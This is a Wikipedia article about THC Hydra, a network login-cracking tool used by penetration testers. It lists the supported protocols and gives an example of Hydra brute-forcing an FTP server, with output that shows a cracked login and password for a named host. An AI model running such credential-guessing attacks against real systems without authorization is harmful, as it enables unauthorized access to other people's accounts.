Hydra (software)

Hydra is a parallelized network logon cracker. Hydra works by using different approaches of generating possible passwords, such as wordlist attacks, brute-force attacks and others. Hydra is commonly used by penetration testers together with a program named crunch, which is used to generate wordlists. Hydra is then used to test the attacks using the wordlists that crunch created.

THC Hydra
Developer(s)THC
Stable release
7.4.2 / January 7, 2013 (2013-01-07)
Repositorygithub.com/vanhauser-thc/thc-hydra
Written inC
Operating systemCross-platform
PlatformUnix
TypePassword cracking
LicenseGNU General Public License (version 3 or later)
Websitewww.thc.org/thc-hydra/

Hydra is set to be updated over time as more services become supported. The creator of Hydra publishes his work in repositories like GitHub.

Supported protocols

Hydra supports many common login protocols like forms on websites, FTP, SMB, POP3, IMAP, MySQL, VNC, SSH and others.[1]

Examples

Here is a sample output in a Debian environment.

$ hydra -L names -P pws ftp://wanne.t-8ch.de
Hydra v7.3 (c)2012 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2013-02-09 00:54:40
[DATA] 16 tasks, 1 server, 516 login tries (l:43/p:12), ~32 tries per task
[DATA] attacking service ftp on port 21
[21][ftp] host: 78.47.172.244   login: john   password: passwd
[STATUS] attack finished for wanne.t-8ch.de (waiting for children to finish)
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2013-02-09 00:54:51

References

  1. "Debian -- Details of package hydra in buster". packages.debian.org. Retrieved 2020-05-26.
This article is issued from Wikipedia. The text is licensed under Creative Commons - Attribution - Sharealike. Additional terms may apply for the media files.